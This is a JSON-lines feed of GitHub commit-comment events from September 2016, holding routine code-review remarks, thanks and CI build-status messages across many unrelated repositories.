{"id":"4620017214","type":"CommitCommentEvent","actor":{"login":"courtney-g"},"repo":{"name":"KhronosGroup/Vulkan-LoaderAndValidationLayers"},"payload":{"comment":{"id":19178683,"position":72,"line":4485,"path":"loader/loader.c","commit_id":"87070d81bca386e4a3fb1295e8d7dc232ec48622","created_at":"2016-09-26T19:48:56Z","updated_at":"2016-09-26T19:48:56Z","body":"This doesn't seem right. Why would we reduce the count of actual devices cached internally in the instance?\r\nWe just need to be sure not to return more than asked for."}},"created_at":"2016-09-26T19:48:56Z"}
{"id":"4620018728","type":"CommitCommentEvent","actor":{"login":"piv199"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19178686,"position":217,"line":250,"path":"Sources/EZSwiftFunctions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-26T19:49:12Z","updated_at":"2016-09-26T19:49:12Z","body":"Is it good to have `ez.globalUserInteractiveQueue`? DispatchQueue is a class, so whenever we need to pass queue we even can write `.global(pos: .qosType)`"}},"created_at":"2016-09-26T19:49:12Z"}
{"id":"4620019265","type":"CommitCommentEvent","actor":{"login":"yaycmyk"},"repo":{"name":"sapegin/react-styleguidist"},"payload":{"comment":{"id":19178687,"position":6,"line":6,"path":"src/utils/markdown-to-jsx.js","commit_id":"f7401bcd4c18eabe643d005aa6421319e69016cd","created_at":"2016-09-26T19:49:18Z","updated_at":"2016-09-26T19:49:18Z","body":"I had a little time today, so I actually implemented it already! https://github.com/yaycmyk/markdown-to-jsx/releases/tag/4.0.3-beta"}},"created_at":"2016-09-26T19:49:18Z"}
{"id":"4620021930","type":"CommitCommentEvent","actor":{"login":"javierluraschi"},"repo":{"name":"rstudio/sparklyr"},"payload":{"comment":{"id":19178691,"position":8,"line":8,"path":"NEWS.md","commit_id":"86791445b4da769ad5b0cb9ed7c583a8bbf7d540","created_at":"2016-09-26T19:49:47Z","updated_at":"2016-09-26T19:49:47Z","body":"Nice! Glad you added a NEWS file!"}},"created_at":"2016-09-26T19:49:47Z"}
{"id":"4620024554","type":"CommitCommentEvent","actor":{"login":"laracasts"},"repo":{"name":"laracasts/How-Do-I-Dry-Up-My-Forms"},"payload":{"comment":{"id":19178693,"position":7,"line":7,"path":"resources/views/posts/form.blade.php","commit_id":"c09e14f9c1417b7eae6493bb1286ec56c162deb5","created_at":"2016-09-26T19:50:16Z","updated_at":"2016-09-26T19:50:16Z","body":"Good catch. I always forget that old() accepts defaults. Just committed the fix."}},"created_at":"2016-09-26T19:50:16Z"}
{"id":"4620028956","type":"CommitCommentEvent","actor":{"login":"juliuste"},"repo":{"name":"juliuste/bahn.guru"},"payload":{"comment":{"id":19178704,"position":null,"line":null,"path":null,"commit_id":"f5b6489bb8007751aa8566117ca905385de05be1","created_at":"2016-09-26T19:51:06Z","updated_at":"2016-09-26T19:51:06Z","body":"See #1 "}},"created_at":"2016-09-26T19:51:06Z"}
{"id":"4620031291","type":"CommitCommentEvent","actor":{"login":"hardillb"},"repo":{"name":"node-red/node-red"},"payload":{"comment":{"id":19178710,"position":null,"line":null,"path":null,"commit_id":"a89c7b1a70cc2818664797d634d7e862d14520f5","created_at":"2016-09-26T19:51:34Z","updated_at":"2016-09-26T19:51:34Z","body":"That is literally wrong :-p"}},"created_at":"2016-09-26T19:51:34Z"}
{"id":"4620032927","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19178714,"position":null,"line":null,"path":null,"commit_id":"33305acefd2a9737a4369485a4d9802317fc94cf","created_at":"2016-09-26T19:51:54Z","updated_at":"2016-09-26T19:51:54Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.264.33305acefd2a9737a4369485a4d9802317fc94cf](http://build.palaso.org/viewLog.html?buildId=77127&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1498, ignored: 17 Build time: 00:07:27"}},"created_at":"2016-09-26T19:51:54Z"}
{"id":"4620035219","type":"CommitCommentEvent","actor":{"login":"DeadneM"},"repo":{"name":"APOPHIS9283/Singularity"},"payload":{"comment":{"id":19178718,"position":null,"line":null,"path":null,"commit_id":"76adf3d41eb7de2cbd41396369e126d0947188db","created_at":"2016-09-26T19:52:20Z","updated_at":"2016-09-26T19:52:20Z","body":"Hi apophis you should revert this shitty commit i was tired and i've git add . instead of selective file and also didn't remove the bad merge... sorry i was just trying stuff ^^ "}},"created_at":"2016-09-26T19:52:20Z"}
{"id":"4620042478","type":"CommitCommentEvent","actor":{"login":"ukos-git"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":19178739,"position":39,"line":86,"path":"pokemongo_bot/cell_workers/evolve_pokemon.py","commit_id":"c53a57e9a2fc43844e62c6492883b5346042e5c3","created_at":"2016-09-26T19:53:44Z","updated_at":"2016-09-26T19:53:44Z","body":"right. couldn't figure that one out."}},"created_at":"2016-09-26T19:53:44Z"}
{"id":"4620054648","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19178762,"position":null,"line":null,"path":null,"commit_id":"50907068e7af7cf1b284b7a5463efd62c565d98b","created_at":"2016-09-26T19:56:00Z","updated_at":"2016-09-26T19:56:00Z","body":"license-update (axelstudios) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-50907068e7af7cf1b284b7a5463efd62c565d98b-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-50907068e7af7cf1b284b7a5463efd62c565d98b-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-26T19:56:00Z"}
{"id":"4620055182","type":"CommitCommentEvent","actor":{"login":"benjaminoakes"},"repo":{"name":"benjaminoakes/maid"},"payload":{"comment":{"id":19178764,"position":21,"line":18,"path":"README.md","commit_id":"d727286d7d9cc9ce0795851070acf2271ce63931","created_at":"2016-09-26T19:56:06Z","updated_at":"2016-09-26T19:56:06Z","body":"That's the definition of shareware."}},"created_at":"2016-09-26T19:56:06Z"}
{"id":"4620056547","type":"CommitCommentEvent","actor":{"login":"rocallahan"},"repo":{"name":"mozilla/rr"},"payload":{"comment":{"id":19178769,"position":null,"line":null,"path":null,"commit_id":"18bc9b566becb2384ff2c80a2352ee71ffd5acb0","created_at":"2016-09-26T19:56:19Z","updated_at":"2016-09-26T19:56:19Z","body":"Great, thanks :-)"}},"created_at":"2016-09-26T19:56:19Z"}
{"id":"4620061395","type":"CommitCommentEvent","actor":{"login":"samclaridge"},"repo":{"name":"NewSpring/Holtzmann"},"payload":{"comment":{"id":19178789,"position":4,"line":3,"path":"imports/pages/devotionals/devotions.Single.js","commit_id":"7beffe3cfc5ced30debd525ecfd7123efa876c42","created_at":"2016-09-26T19:57:12Z","updated_at":"2016-09-26T19:57:12Z","body":"change to import graphql\r\n"}},"created_at":"2016-09-26T19:57:12Z"}
{"id":"4620062635","type":"CommitCommentEvent","actor":{"login":"karies"},"repo":{"name":"root-mirror/root"},"payload":{"comment":{"id":19178797,"position":5,"line":149,"path":"hist/hist/v7/inc/ROOT/THist.h","commit_id":"e1d8a316ce78698f410d12c8ec8b767a1db5488a","created_at":"2016-09-26T19:57:25Z","updated_at":"2016-09-26T19:57:25Z","body":"Good catch, thanks! I need many many more tests...\n"}},"created_at":"2016-09-26T19:57:25Z"}
{"id":"4620063945","type":"CommitCommentEvent","actor":{"login":"NereaPardo91"},"repo":{"name":"NereaPardo91/ptavi-p2"},"payload":{"comment":{"id":19178799,"position":1,"line":1,"path":"calcplus.py","commit_id":"527f43832fbc8a03c74170316d9c701331284aee","created_at":"2016-09-26T19:57:39Z","updated_at":"2016-09-26T19:57:39Z","body":"Buenas noches Gregorio,\r\nHe querido subir mi programa calcplus.py leyendo desde un fichero normal y sin usar csv(que era la ultima modificacion que tenia por que no lo conseguia) y tras conseguirlo he tenido ciertos problemas en casa para subir el finalizado asi que lo he subido directamente pero se me han borrado los commits y todo. "}},"created_at":"2016-09-26T19:57:39Z"}
{"id":"4620065493","type":"CommitCommentEvent","actor":{"login":"samclaridge"},"repo":{"name":"NewSpring/Holtzmann"},"payload":{"comment":{"id":19178802,"position":87,"line":60,"path":"imports/pages/devotionals/devotions.Single.js","commit_id":"7beffe3cfc5ced30debd525ecfd7123efa876c42","created_at":"2016-09-26T19:57:56Z","updated_at":"2016-09-26T19:57:56Z","body":"Let's try and remove this and see what happens"}},"created_at":"2016-09-26T19:57:56Z"}
{"id":"4620066339","type":"CommitCommentEvent","actor":{"login":"NereaPardo91"},"repo":{"name":"NereaPardo91/ptavi-p2"},"payload":{"comment":{"id":19178807,"position":44,"line":1,"path":"calcplus.py","commit_id":"527f43832fbc8a03c74170316d9c701331284aee","created_at":"2016-09-26T19:58:05Z","updated_at":"2016-09-26T19:58:05Z","body":"Este es el programa final calcplus.py\r\n\r\nSiento las molestias"}},"created_at":"2016-09-26T19:58:05Z"}
{"id":"4620066356","type":"CommitCommentEvent","actor":{"login":"alexyaoyang"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":19178806,"position":36,"line":83,"path":"pokemongo_bot/cell_workers/evolve_pokemon.py","commit_id":"c53a57e9a2fc43844e62c6492883b5346042e5c3","created_at":"2016-09-26T19:58:05Z","updated_at":"2016-09-26T19:58:05Z","body":"@thejamespinto Needs brackets here too: `if self._should_log_update():`"}},"created_at":"2016-09-26T19:58:05Z"}
{"id":"4620068270","type":"CommitCommentEvent","actor":{"login":"samclaridge"},"repo":{"name":"NewSpring/Holtzmann"},"payload":{"comment":{"id":19178812,"position":98,"line":70,"path":"imports/pages/devotionals/devotions.Single.js","commit_id":"7beffe3cfc5ced30debd525ecfd7123efa876c42","created_at":"2016-09-26T19:58:27Z","updated_at":"2016-09-26T19:58:27Z","body":"@connect(mapStateToProps)\r\n@withDevotion"}},"created_at":"2016-09-26T19:58:27Z"}
{"id":"4620069663","type":"CommitCommentEvent","actor":{"login":"samclaridge"},"repo":{"name":"NewSpring/Holtzmann"},"payload":{"comment":{"id":19178817,"position":4,"line":3,"path":"imports/pages/devotionals/devotions.Single.js","commit_id":"7beffe3cfc5ced30debd525ecfd7123efa876c42","created_at":"2016-09-26T19:58:44Z","updated_at":"2016-09-26T19:58:44Z","body":"`import { connect } from \"react-redux\";"}},"created_at":"2016-09-26T19:58:44Z"}
{"id":"4620070115","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore"},"payload":{"comment":{"id":19178819,"position":null,"line":null,"path":null,"commit_id":"0265f353c0f102b5bedf4b4e2f4bb77b56d363e5","created_at":"2016-09-26T19:58:48Z","updated_at":"2016-09-26T19:58:48Z","body":"@cybrann , we moved here https://github.com/JadeEmu/JadeCore_547"}},"created_at":"2016-09-26T19:58:48Z"}
{"id":"4620074339","type":"CommitCommentEvent","actor":{"login":"hleb-albau"},"repo":{"name":"marina-gergalova/lab1"},"payload":{"comment":{"id":19178827,"position":4,"line":4,"path":"src/lab1/Nutritious.java","commit_id":"9f0b5dec40d8cab0397f2382050bbc5f95ae368c","created_at":"2016-09-26T19:59:36Z","updated_at":"2016-09-26T19:59:36Z","body":"delete"}},"created_at":"2016-09-26T19:59:36Z"}
{"id":"4620075633","type":"CommitCommentEvent","actor":{"login":"hleb-albau"},"repo":{"name":"marina-gergalova/lab1"},"payload":{"comment":{"id":19178831,"position":4,"line":21,"path":"src/lab1/MainApplication.java","commit_id":"9f0b5dec40d8cab0397f2382050bbc5f95ae368c","created_at":"2016-09-26T19:59:50Z","updated_at":"2016-09-26T19:59:50Z","body":"move to constructor"}},"created_at":"2016-09-26T19:59:50Z"}
{"id":"4615385079","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19166621,"position":null,"line":null,"path":null,"commit_id":"d89695c92ed6d37be4a39cd7b1f11b8c46ebf695","created_at":"2016-09-26T02:00:32Z","updated_at":"2016-09-26T02:00:32Z","body":"Nice, going to give a try in a few ;)"}},"created_at":"2016-09-26T02:00:32Z"}
{"id":"4615390913","type":"CommitCommentEvent","actor":{"login":"slurmulon"},"repo":{"name":"camirmas/grapple"},"payload":{"comment":{"id":19166638,"position":5,"line":181,"path":"lib/grapple/hook.ex","commit_id":"3b192654961f6090f0ed8137bd83bdd232d02db7","created_at":"2016-09-26T02:03:17Z","updated_at":"2016-09-26T02:03:17Z","body":"hrm sorry about this, not sure why my tests didn't fail. I definitely ran them"}},"created_at":"2016-09-26T02:03:17Z"}
{"id":"4615398123","type":"CommitCommentEvent","actor":{"login":"zenspider"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":19166652,"position":null,"line":null,"path":null,"commit_id":"c9dd5918f40dc6df3a237f634b9689bfbb591662","created_at":"2016-09-26T02:06:43Z","updated_at":"2016-09-26T02:06:43Z","body":"@nagachika OK! Sorry! 5.8.5 is released with a new cert. I _think_ I did everything to regenerate the cert correctly."}},"created_at":"2016-09-26T02:06:43Z"}
{"id":"4615398931","type":"CommitCommentEvent","actor":{"login":"zensh"},"repo":{"name":"macacajs/macaca-cli"},"payload":{"comment":{"id":19166654,"position":null,"line":null,"path":null,"commit_id":"5032141e0a911e09d7d5a895e79292fe94b5be90","created_at":"2016-09-26T02:07:04Z","updated_at":"2016-09-26T02:07:04Z","body":"@xudafeng 改成 promise 形式了，macaca 中毕竟没有集成 co-mocha。"}},"created_at":"2016-09-26T02:07:04Z"}
{"id":"4615401990","type":"CommitCommentEvent","actor":{"login":"spicemix"},"repo":{"name":"angular/quickstart"},"payload":{"comment":{"id":19166659,"position":null,"line":null,"path":null,"commit_id":"ea70d3a88dae6d3c104bb60fe343caf037e1bb76","created_at":"2016-09-26T02:08:31Z","updated_at":"2016-09-26T02:08:31Z","body":"Are these necessary? They give error notices in npm.\r\n\r\n```javascript\r\n// package.json\r\n+    \"karma-phantomjs-launcher\": \"^1.0.2\",\r\n+    \"karma-sourcemap-loader\": \"^0.3.7\",\r\n+    \"karma-webpack\": \"^1.8.0\",\r\n```"}},"created_at":"2016-09-26T02:08:31Z"}
{"id":"4615402348","type":"CommitCommentEvent","actor":{"login":"Scrivener07"},"repo":{"name":"Scrivener07/buddah"},"payload":{"comment":{"id":19166661,"position":null,"line":null,"path":null,"commit_id":"57243b35db3bd4a404044de1ccca39f0aa7a6338","created_at":"2016-09-26T02:08:40Z","updated_at":"2016-09-26T02:08:40Z","body":"This is a dll extension for third party gaming software. Im not sure if cli, gui and/or api keywords apply here."}},"created_at":"2016-09-26T02:08:40Z"}
{"id":"4615403254","type":"CommitCommentEvent","actor":{"login":"Shun510"},"repo":{"name":"Shun510/Matlab-"},"payload":{"comment":{"id":19166663,"position":null,"line":null,"path":null,"commit_id":"c8f18976f3707880dcfcb9e745e443e6500c64ac","created_at":"2016-09-26T02:09:05Z","updated_at":"2016-09-26T02:09:05Z","body":"MATLAB(画像処理工学）\r\n"}},"created_at":"2016-09-26T02:09:05Z"}
{"id":"4615408348","type":"CommitCommentEvent","actor":{"login":"barrierwings-jay"},"repo":{"name":"barrierwings-jay/django_practice"},"payload":{"comment":{"id":19166670,"position":null,"line":null,"path":null,"commit_id":"4fb9c6653d860bc77b2189fc49596b9ac61a9490","created_at":"2016-09-26T02:11:34Z","updated_at":"2016-09-26T02:11:34Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [관리자화면 프로토타입](https://trello.com/c/YrCih7Tz/1--)"}},"created_at":"2016-09-26T02:11:34Z"}
{"id":"4615409813","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19166673,"position":null,"line":null,"path":null,"commit_id":"34f81a8c6361873dbf37a27bc7125673d4403dc0","created_at":"2016-09-26T02:12:15Z","updated_at":"2016-09-26T02:12:15Z","body":"You also need this commit https://github.com/shminer/android_kernel_lge_g5/commit/7af710f16a1366eb3d20060a62f1234ab69c1e71"}},"created_at":"2016-09-26T02:12:15Z"}
{"id":"4615413242","type":"CommitCommentEvent","actor":{"login":"Zebbly"},"repo":{"name":"Zebbly/adventure-dreams"},"payload":{"comment":{"id":19166681,"position":null,"line":null,"path":null,"commit_id":"3a5a2be5d33da76fc48b157392e778901ab99d9b","created_at":"2016-09-26T02:13:57Z","updated_at":"2016-09-26T02:13:57Z","body":"September 25"}},"created_at":"2016-09-26T02:13:57Z"}
{"id":"4615418729","type":"CommitCommentEvent","actor":{"login":"MWiss"},"repo":{"name":"MWiss/Sorasu"},"payload":{"comment":{"id":19166692,"position":27,"line":27,"path":"scripts/main.py","commit_id":"f2f4eb7ccb90fcc5c6ebed402919f80f1fa6625e","created_at":"2016-09-26T02:16:29Z","updated_at":"2016-09-26T02:16:29Z","body":"Yeah I forgot to change that\r\n"}},"created_at":"2016-09-26T02:16:29Z"}
{"id":"4615418738","type":"CommitCommentEvent","actor":{"login":"nlguillemot"},"repo":{"name":"jeffamstutz/CppSPMD"},"payload":{"comment":{"id":19166693,"position":null,"line":null,"path":null,"commit_id":"4969a335b0aae35732557612e212686d1d52e12a","created_at":"2016-09-26T02:16:29Z","updated_at":"2016-09-26T02:16:29Z","body":"I think the varying types have to be defined as inner classes of the kernel, since their definition changes based on the kernel's ISA and width."}},"created_at":"2016-09-26T02:16:29Z"}
{"id":"4615419335","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19166695,"position":null,"line":null,"path":null,"commit_id":"34f81a8c6361873dbf37a27bc7125673d4403dc0","created_at":"2016-09-26T02:16:47Z","updated_at":"2016-09-26T02:16:47Z","body":"Or you may see backlight flash when swtich to hl mode."}},"created_at":"2016-09-26T02:16:47Z"}
{"id":"4615419950","type":"CommitCommentEvent","actor":{"login":"zenspider"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":19166697,"position":null,"line":null,"path":null,"commit_id":"c9dd5918f40dc6df3a237f634b9689bfbb591662","created_at":"2016-09-26T02:17:00Z","updated_at":"2016-09-26T02:17:00Z","body":"and now 5.9.1 is released as well. "}},"created_at":"2016-09-26T02:17:00Z"}
{"id":"4615427771","type":"CommitCommentEvent","actor":{"login":"Codepixl"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":19166714,"position":null,"line":null,"path":null,"commit_id":"89dce509219f896b78e633c4e6f4ab2a8d5c40bb","created_at":"2016-09-26T02:20:41Z","updated_at":"2016-09-26T02:20:41Z","body":"@IsaiahPatton You can submit a pull request if you want credit for that. Thanks!"}},"created_at":"2016-09-26T02:20:41Z"}
{"id":"4615428943","type":"CommitCommentEvent","actor":{"login":"kann23"},"repo":{"name":"cburd87/Stockfish"},"payload":{"comment":{"id":19166715,"position":null,"line":null,"path":null,"commit_id":"19985a667b6c39b57cce38ebaf51a5bcfc838a78","created_at":"2016-09-26T02:21:14Z","updated_at":"2016-09-26T02:21:14Z","body":"If I'm understanding line 865 correctly, sf only scales endgame scores.\r\n\r\nValue v =  mg_value(score) * int(ei.me->game_phase())\r\n           + eg_value(score) * int(PHASE_MIDGAME - ei.me->game_phase()) * sf / SCALE_FACTOR_NORMAL;\r\n\r\nPerhaps I could pass an opp_bish_sf variable to evaluate_scale_factor by reference and do something like\r\n\r\n  if (opp_bish_sf)\r\n\t  score *= opp_bish_sf;"}},"created_at":"2016-09-26T02:21:14Z"}
{"id":"4615429767","type":"CommitCommentEvent","actor":{"login":"benschac"},"repo":{"name":"JulianNorton/weather-10kb"},"payload":{"comment":{"id":19166717,"position":142,"line":127,"path":"views/pages/index.ejs","commit_id":"94d5dba6d36a9fbf37533f39d9ce1b7a68e2c58e","created_at":"2016-09-26T02:21:37Z","updated_at":"2016-09-26T02:21:37Z","body":"remove console.log in production."}},"created_at":"2016-09-26T02:21:37Z"}
{"id":"4615430805","type":"CommitCommentEvent","actor":{"login":"benschac"},"repo":{"name":"JulianNorton/weather-10kb"},"payload":{"comment":{"id":19166718,"position":113,"line":76,"path":"views/pages/index.ejs","commit_id":"94d5dba6d36a9fbf37533f39d9ce1b7a68e2c58e","created_at":"2016-09-26T02:22:07Z","updated_at":"2016-09-26T02:22:07Z","body":"There's probably a better way of doing this."}},"created_at":"2016-09-26T02:22:07Z"}
{"id":"4615432433","type":"CommitCommentEvent","actor":{"login":"benschac"},"repo":{"name":"JulianNorton/weather-10kb"},"payload":{"comment":{"id":19166722,"position":79,"line":201,"path":"public/style/styles-compiler.scss","commit_id":"94d5dba6d36a9fbf37533f39d9ce1b7a68e2c58e","created_at":"2016-09-26T02:22:57Z","updated_at":"2016-09-26T02:22:57Z","body":"Create margin mixin."}},"created_at":"2016-09-26T02:22:57Z"}
{"id":"4615432966","type":"CommitCommentEvent","actor":{"login":"benschac"},"repo":{"name":"JulianNorton/weather-10kb"},"payload":{"comment":{"id":19166724,"position":91,"line":213,"path":"public/style/styles-compiler.scss","commit_id":"94d5dba6d36a9fbf37533f39d9ce1b7a68e2c58e","created_at":"2016-09-26T02:23:11Z","updated_at":"2016-09-26T02:23:11Z","body":"Create margin mixin."}},"created_at":"2016-09-26T02:23:11Z"}
{"id":"4615433685","type":"CommitCommentEvent","actor":{"login":"benschac"},"repo":{"name":"JulianNorton/weather-10kb"},"payload":{"comment":{"id":19166726,"position":41,"line":125,"path":"public/style/styles-compiler.scss","commit_id":"94d5dba6d36a9fbf37533f39d9ce1b7a68e2c58e","created_at":"2016-09-26T02:23:31Z","updated_at":"2016-09-26T02:23:31Z","body":"Use color variable."}},"created_at":"2016-09-26T02:23:31Z"}
{"id":"4615439953","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"hjnilsson/rme"},"payload":{"comment":{"id":19166745,"position":null,"line":null,"path":null,"commit_id":"5c5aab15b579b58970a4f0f4775704f64b2ef19b","created_at":"2016-09-26T02:26:25Z","updated_at":"2016-09-26T02:26:25Z","body":"Thanks!"}},"created_at":"2016-09-26T02:26:25Z"}
{"id":"4615441993","type":"CommitCommentEvent","actor":{"login":"fauxparse"},"repo":{"name":"ezza/pleasant-lawyer"},"payload":{"comment":{"id":19166753,"position":null,"line":null,"path":null,"commit_id":"6aafe9583c4d0cb31b8ff07e266be35f096700af","created_at":"2016-09-26T02:27:22Z","updated_at":"2016-09-26T02:27:22Z","body":"FLIP I changed the wrong line 😔"}},"created_at":"2016-09-26T02:27:22Z"}
{"id":"4615443278","type":"CommitCommentEvent","actor":{"login":"mogest"},"repo":{"name":"ezza/pleasant-lawyer"},"payload":{"comment":{"id":19166757,"position":null,"line":null,"path":null,"commit_id":"6aafe9583c4d0cb31b8ff07e266be35f096700af","created_at":"2016-09-26T02:28:00Z","updated_at":"2016-09-26T02:28:00Z","body":"Oops :)"}},"created_at":"2016-09-26T02:28:00Z"}
{"id":"4615446078","type":"CommitCommentEvent","actor":{"login":"xfunforx"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19166764,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-26T02:29:17Z","updated_at":"2016-09-26T02:29:17Z","body":"> \r\n\r\n#import <SpringBoard/SpringBoard.h>\r\n\r\n%hook SpringBoard\r\n\r\n-(void)applicationDidFinishLaunching:(id)application {\r\n%orig;\r\n\r\nUIAlertView *alert = [[UIAlertView alloc] initWithTitle:@\"Welcome\" \r\nmessage:@\"Welcome to your iOS Device Ted!\" \r\ndelegate:nil \r\ncancelButtonTitle:@\"security.ios-wiki.com\" otherButtonTitles:nil];\r\n\r\n[alert show];\r\n[alert release];\r\n\r\n}\r\n\r\n%end\r\n\r\nedit twea.xm file and have a test."}},"created_at":"2016-09-26T02:29:17Z"}
{"id":"4615449507","type":"CommitCommentEvent","actor":{"login":"JulianNorton"},"repo":{"name":"JulianNorton/weather-10kb"},"payload":{"comment":{"id":19166770,"position":113,"line":76,"path":"views/pages/index.ejs","commit_id":"94d5dba6d36a9fbf37533f39d9ce1b7a68e2c58e","created_at":"2016-09-26T02:30:44Z","updated_at":"2016-09-26T02:30:44Z","body":"better way of doing what?"}},"created_at":"2016-09-26T02:30:44Z"}
{"id":"4615452903","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"LiquidNougat/frameworks_base"},"payload":{"comment":{"id":19166780,"position":null,"line":null,"path":null,"commit_id":"ff8cc428e65e838f7d44a7da4e5c86071f3dbd36","created_at":"2016-09-26T02:32:19Z","updated_at":"2016-09-26T02:32:19Z","body":"You're picking every commit I push why not just pick the reverts too? You are pathetic."}},"created_at":"2016-09-26T02:32:19Z"}
{"id":"4615453561","type":"CommitCommentEvent","actor":{"login":"wonderful60"},"repo":{"name":"wonderful60/ss-panel"},"payload":{"comment":{"id":19166781,"position":5,"line":100,"path":"app/Controllers/AuthController.php","commit_id":"c29b5a9d8eb71a8efa2d3c72e7cd927f03223b5b","created_at":"2016-09-26T02:32:38Z","updated_at":"2016-09-26T02:32:38Z","body":"longtugame email reg"}},"created_at":"2016-09-26T02:32:38Z"}
{"id":"4615457340","type":"CommitCommentEvent","actor":{"login":"Tatsh"},"repo":{"name":"mathiasbynens/dotfiles"},"payload":{"comment":{"id":19166790,"position":null,"line":null,"path":null,"commit_id":"b98a6597c4b0f3a307cff17a062ee46cc8521502","created_at":"2016-09-26T02:34:18Z","updated_at":"2016-09-26T02:34:18Z","body":"@mgol add TV simulator?"}},"created_at":"2016-09-26T02:34:18Z"}
{"id":"4615457607","type":"CommitCommentEvent","actor":{"login":"samveen"},"repo":{"name":"python-oca/python-oca"},"payload":{"comment":{"id":19166792,"position":92,"line":112,"path":"oca/vm.py","commit_id":"11519d6fb500e5342d29502aec36006b8f4c157e","created_at":"2016-09-26T02:34:24Z","updated_at":"2016-09-26T02:34:24Z","body":"The short name name here might be very misleading, as it matches the index for option `'PROLOG_MIGRATE_SUSPEND'`. it might be better to change this to`'prolog_migrate_sus_fail'` instead of `'prolog_migrate_suspend'`"}},"created_at":"2016-09-26T02:34:24Z"}
{"id":"4615460471","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":19166801,"position":9,"line":353,"path":"src/raftstore/store/peer.rs","commit_id":"9a608b309b6c7099da42e8d8af02a58d04dfb80b","created_at":"2016-09-26T02:35:46Z","updated_at":"2016-09-26T02:35:46Z","body":"no need to do this, complex. \r\nif we want to monitor another msg type, how do we do?"}},"created_at":"2016-09-26T02:35:46Z"}
{"id":"4615464652","type":"CommitCommentEvent","actor":{"login":"nine7nine"},"repo":{"name":"nine7nine/qhull"},"payload":{"comment":{"id":19166815,"position":null,"line":null,"path":null,"commit_id":"d0e488d0efad568f76626525f0d961b19562a104","created_at":"2016-09-26T02:37:38Z","updated_at":"2016-09-26T02:37:38Z","body":"Ah, I never bumped into user_eg2 because it wasn't present in 2012 version. makes sense"}},"created_at":"2016-09-26T02:37:38Z"}
{"id":"4615466714","type":"CommitCommentEvent","actor":{"login":"gsfeng2015"},"repo":{"name":"gsfeng2015/ums"},"payload":{"comment":{"id":19166822,"position":3,"line":3,"path":"README.md","commit_id":"dedf1134ff75c8b737ad23f4ce547a3be5b19ea0","created_at":"2016-09-26T02:38:36Z","updated_at":"2016-09-26T02:38:36Z","body":"IDE:IDEA"}},"created_at":"2016-09-26T02:38:36Z"}
{"id":"4615468753","type":"CommitCommentEvent","actor":{"login":"hhkbp2"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":19166825,"position":9,"line":353,"path":"src/raftstore/store/peer.rs","commit_id":"9a608b309b6c7099da42e8d8af02a58d04dfb80b","created_at":"2016-09-26T02:39:37Z","updated_at":"2016-09-26T02:39:37Z","body":"Add a new message type in this loop if it's needed."}},"created_at":"2016-09-26T02:39:37Z"}
{"id":"4615471511","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":19166834,"position":9,"line":353,"path":"src/raftstore/store/peer.rs","commit_id":"9a608b309b6c7099da42e8d8af02a58d04dfb80b","created_at":"2016-09-26T02:40:52Z","updated_at":"2016-09-26T02:40:52Z","body":"so how we can two message types count?  return a (acc1, acc2) ? "}},"created_at":"2016-09-26T02:40:52Z"}
{"id":"4615471761","type":"CommitCommentEvent","actor":{"login":"jrfnl"},"repo":{"name":"squizlabs/PHP_CodeSniffer"},"payload":{"comment":{"id":19166835,"position":26,"line":550,"path":"CodeSniffer.php","commit_id":"3df85dcb433e4dbc82a435554f717ca5958fd668","created_at":"2016-09-26T02:41:00Z","updated_at":"2016-09-26T02:41:00Z","body":"Thanks @gsherwood ! It was the [PHPCompatibility unit test framework](https://github.com/wimg/PHPCompatibility/tree/master/Tests) which was breaking.\r\nYou're right a single sniff should probably be specified there as well and I may try to work that in, but I'd need to study both frameworks in a lot more detail to see if I can. This seemed like a quick fix to get things working again.\r\n\r\nThe reason the PHPCompatibility project doesn't use the PHPCS native test framework is that for nearly all individual test cases they need to specify different command line config values (using `PHP_CodeSniffer::setConfigData()` in the test framework to do so). So they process each test case file with `processFile()` lots of times with different config values to test whether the sniffs work correctly.\r\n\r\nThe config values are needed to set which PHP versions the tested code should be compatibility with.\r\nSee https://github.com/wimg/PHPCompatibility#using-the-compatibility-sniffs for more info about the config values needed.\r\nHope that clarifies it."}},"created_at":"2016-09-26T02:41:00Z"}
